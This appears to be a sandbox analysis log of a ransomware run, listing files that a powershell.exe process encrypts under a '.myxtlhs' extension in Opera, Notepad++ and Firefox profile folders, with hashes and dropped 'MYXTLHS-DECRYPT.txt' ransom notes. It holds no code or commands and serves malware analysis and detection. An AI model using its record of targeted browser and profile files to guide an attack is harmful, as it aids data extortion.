1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.myxtlhs
binary
MD5: bc2dab67dcaa77f2b197d09642d1c719
SHA256: fd539401ad4e7c87da7d8ea93ed9d34552ea7df01df11f663b48ffaf4cef6768
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.myxtlhs
binary
MD5: 795ef6f605b3a3b88dbe7a0683e331aa
SHA256: be9ed6ce405bc43d59f194d93e42a7209f1c1392fb27ed96ea9f61eb31373757
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.myxtlhs
binary
MD5: 2999c20db7f852012a9a07118ffce206
SHA256: 86a768c506aa1662d35c8d0e8732a80de9f9b6746a2ee4eeb5a17d792140d587
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.myxtlhs
binary
MD5: 889776f92d90c5417a5841425ed41aed
SHA256: d2ceeff4d19e3e5952611f3934528154fa3e44587d83c85510ac1e6ba419bf01
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.myxtlhs
binary
MD5: f7d90a4ebbdc08ff8fdf153c319d70eb
SHA256: 9d90d2ff5928fa9020e5f15ad170e457bb6d4b26f529da7d72019f42583db1af
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.myxtlhs
binary
MD5: a155f013414a01383754c661c2efdf8b
SHA256: 6f0d64805604a47ad1bfc30f11e8837611002428b391d9e29737ab01da17c8bd
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.myxtlhs
binary
MD5: 8ef36723f99468e90b43ef658df6473d
SHA256: 1a60064dd5897bc23a121e534fa32b7df18dc52b8693c10d2bfff7d27f26aac9
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.myxtlhs
binary
MD5: 5dcacb630f4d2fdc18bd485c47046e0a
SHA256: 61c44b0536fed8533a4ea8f00565066ece7e76f85f96bce7b74c35aa163730a0
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.myxtlhs
binary
MD5: 0828ecc3cdf50fb7b9806478ff17e23c
SHA256: 58e3a4ca23091d2bf9bb9e53eeca9f674ce22f5425cb048a4743cd59d5125191
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.myxtlhs
binary
MD5: d9c7a4becdb0debbbbda12418e8a649e
SHA256: 7d93f9bd0c36c3f5bae44668a0afb53074754a5f6ff5cce6d052765e684497b7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.myxtlhs
binary
MD5: 11da85a40b316041e9a8213d45cc4dde
SHA256: 8f9232a682c63dce1c68ca8ef201209c664274e73a11e70b4c9f163af3e92335
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.myxtlhs
binary
MD5: f523af8105e5bb33e1e76c0bd6f00175
SHA256: 9b97469ef5c09825b8f8886d1d1a1dfa48f309d64152c1fce3b6c5e5883a9c38
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.myxtlhs
binary
MD5: 0fddc3530f9e7c02820aebf6ce6b486a
SHA256: 9ce43a82f2029288f5e20f33b310e094e6d94b081608a5bfbcdd91e48fb82dda
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.myxtlhs
binary
MD5: 58520b264d0c099c186d299af277f7fa
SHA256: e63e3bdde24aebf41e2c8cead1110a61c03498898659d5afa726798b5d4e6b9a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.myxtlhs
binary
MD5: 29fdf165be3350c9a56580edc5e4df48
SHA256: 47a86cad05e6cff4340f12cfe6052d5c4fb4cf79ca2695d098a8e35c5bcea414
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.myxtlhs
binary
MD5: 79c10cf627af773b2a0f584444aef8cb
SHA256: 57c7a4576d644d2470cd3f966ceb881cd9a1df072290010282a17222a14ab25a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.myxtlhs
binary
MD5: 65bb5b60823276d754dd2af102de9ece
SHA256: e729c44e820f7cfa853c5517457a67dbd232f5330d9606bbd698ddb7bd470b56
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.myxtlhs
pgc
MD5: 6a53d58320f191dd38187af825f7066e
SHA256: 4d169a4cf2341a3b6b30144361ed782764a68190b9a62c12e315d9181274ec81
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.myxtlhs
binary
MD5: 7f14c5e907e96a35af1c61d4ed4c19da
SHA256: aa2c8fbbeacd44eb880d48dfa3d04624277c239c846e0a0bc35f2372c8d39f5c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.myxtlhs
binary
MD5: da85b768d5e75c8f90f4f801fedc2117
SHA256: 223e55bab07effccd135c727f7bb303cdd808f00b475cc783fc673abf9f71b7d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.myxtlhs
binary
MD5: 778fba1e06092f477694eb429e2e6d27
SHA256: a7dfff68c3d287896996df7a33a22b9198a781a10e4c11c566269a7d13478745
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.myxtlhs
binary
MD5: 2adaf389c6e356096a5c871d64d80583
SHA256: 168510091379a2d8ba12859ef1d7451a27e005e826729c9422a6b853845b71b6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.myxtlhs
binary
MD5: be7b80478f18e774283c933501b4c618
SHA256: 12c86394857df4fb01d650bcb28696df09a7abd40b1bec753884665b283be938
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.myxtlhs
binary
MD5: a6c35b2040345c997237dac8cd313b81
SHA256: 2633d642199d380554a89171efb64b600dae3bc9045806ffcf383d9100bb3590
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.myxtlhs
binary
MD5: 507f47557aeaf02be77bada123c0ad65
SHA256: b274f7be8f9825e5183d3e0a8edcb68852581e4a6d25c05b316e8dc548bac4b1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.myxtlhs
binary
MD5: cff7deabc68d6f5dd84bd04743111e7c
SHA256: a173e9bcb3b9f1b8b17d70a62e4f722822aa7216d11420c0e24c6a7ec110853d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.myxtlhs
binary
MD5: 2fbf793aaa5c7293fdaf57d165de2711
SHA256: 783ac891e8bf6b6d86e92aef8a653c6ab17dd425c4b8b009abfa7121c73c9052
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.myxtlhs
binary
MD5: 1a199b7874e74cf9f6251ce982887f71
SHA256: a24f0423f5f892126c8df066df6930f2e5084c59b7096dc056bb5076a3a3fe53
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.myxtlhs
binary
MD5: a02b2619a7dc38edc0f5848d66adf42b
SHA256: 488b149928324e90bcae58c1e40f14d85026ec0d21384dccebd7192f6c09b986
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.myxtlhs
binary
MD5: 4c96a47bae545a9d2f0a1b715fffe12c
SHA256: 1d8f51d46706c6d521e0301595159678bb9da4a6bffbb0372b36ac4ec35ec43f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.myxtlhs
binary
MD5: 2dff3ba0d8c1bcbfe46136b1378bb06a
SHA256: 293f3f35cdacc0dfc5aa5f7f37b47a5d41c66b8a6b2311a4542fc522cf76cca3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.myxtlhs
binary
MD5: 825b27c9f5dd3b4832a894645dd27644
SHA256: 5bf1ed8587f43a7dc08dc43f95c22251af4bd2290a5efd0b32ff8fd1c797be4f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml.myxtlhs
binary
MD5: acc40840fdb4135290b85f36949661c9
SHA256: 9bd11f3a5c1410bc0e0d32d2f64d4d6d95d8356ee94f894033fe4ffc058d43f3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml.myxtlhs
binary
MD5: 0101531f70c65836f16aaa704c743d6a
SHA256: 90150957d09a590deae52e3eaeed850fc92a46d568fee66861bf77eb922e7e56
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini.myxtlhs
binary
MD5: b33d556aa339c46693bc04af7f306933
SHA256: f6504c1cf5923e269d5d059068c3dd44d973b6b9a9fe5a9b7dbe993cc016c179
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\langs.xml.myxtlhs
binary
MD5: 16a31a9da3891f907bb75b3c969c552b
SHA256: e64fe7b7451f2ace061e514cd6abd222f06421ce6127ca5ea2f9e1429a23baae
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\langs.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.myxtlhs
binary
MD5: 3dbc65542a51dda8640527024e1dd780
SHA256: 5b0e231763d97a820c8ee256f123fbac4d67c3b5af9a3597987523aabb5935f2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.myxtlhs
binary
MD5: 041c679736bcebc74f4abaa4efb7e5d4
SHA256: 53b39fd7b32cd9d447e582d06f693e089a945deab009b5941722b6cebad91e91
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.myxtlhs
binary
MD5: f4084fee67ca939bfe1bc4041b50609b
SHA256: e3a7037004006070a3605962129cce348d267301afa5cb03020e339a3d5061ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.myxtlhs
binary
MD5: 2436b830112bcc120d5240cfac4444e8
SHA256: a6b1bd762c2cd4b6992cbc4894d101472f1ab3e673707258d53ee94691ca0915
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.myxtlhs
binary
MD5: 8644e4de4405ce2ad9c3a827c42e2dbc
SHA256: d1f9abce10f06f3ab3f5f05fa616601c4f4645f34a44d3f6d30a1f4d02776848
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.myxtlhs
mp3
MD5: c4cc09ecc6eb0797836359e736ba0fb0
SHA256: 9636e5e77fa324a9e08ce4a62ae19049f71ba9f5cdf9c522b7ca24f3c2832265
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.myxtlhs
binary
MD5: e131cb0d0477a32be58a4285ae021eb2
SHA256: c84b503816677e976ca7b5b5138c49bbeabb3c39b413d84085e6eebe8168b73f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.myxtlhs
binary
MD5: a20f96417f6c9c46c3a999a8a83201d8
SHA256: c659615981d43576e62404940092f8ee48df030fd0ca9bb43d892485a2ef375b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.myxtlhs
binary
MD5: 5b384e62721b93cadcd06ef0e8d576f9
SHA256: 4a92eb7a996796275ed566289ba6a8f33ff276ea3c32f9bbd03dcab79d24502f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.myxtlhs
binary
MD5: 31aeaf17a0506825d1b696942cd3e963
SHA256: 235dcfdf43adb41cb5d615134e7885e87cead5573da90c62bd9c79de56d98a32
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.myxtlhs
binary
MD5: 58d8511b25fb881d198e03adf270b56a
SHA256: a8e12bf2d2f19490270ac859c7d9babddec02b989933e1e8b0ebf81a983d132c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.myxtlhs
binary
MD5: b4cc656ad74b37eef419cedc20c54bb5
SHA256: a2755a3ba4571b0f0139396fc2ebdd3c74122159a01600b2d78699e4a07d893b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.myxtlhs
binary
MD5: 565026c4040ac8bfd231eb45ed87c872
SHA256: 837c33fde7286d18cc4fa98866e2d6413a074874f3c871b8f12067c2a1d709dd
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.myxtlhs
binary
MD5: f9ea709b44cd3d6cc6d96647a2bf4845
SHA256: ec3f6ce248665d9f50f63b9dbee05f5becdbc70d867306db16224729ba9c41ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.myxtlhs
binary
MD5: cabeda999e04d061ca2d2224b9c2eced
SHA256: 256f04d99f89abefef60e6c94703dcfc506686cd7583408f0414d82dd79a460f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.myxtlhs
binary
MD5: fa90ebf322ffb0159a2beb15bb149ffc
SHA256: 1fc64efa6d3c56b9be60a72d266d6c409900cafd7bef9bf8d5b79da01deaa375
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.myxtlhs
binary
MD5: 3d2cf822f3dc9c05db144670c8215008
SHA256: acea8bf1992a03868315b8e1e092c66f5a43c7ce468f3d4d7158b2f3f6cbd1d9
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9ca9b63bcaf7d05ed3f3676f95b50f89
SHA256: 7aa38d3cb4e742e0c1f29c450010de7fbdc87db918b26259950df71ccf4b8e16
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.myxtlhs
binary
MD5: 3dace0831f8cc374997a03f376f7c50b
SHA256: c29fe17ff36fa1695c08000ddbfcfe430e8cc5f6fc25906f3a89b76480a7b16b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.myxtlhs
binary
MD5: 6f7f6d2a2d13bc191710e52a5c67f6f8
SHA256: 12a425f660f9c784b0ecf739040a575ede5f796d7546c674c6d0e8d686aebd3e
1684
powershell.exe
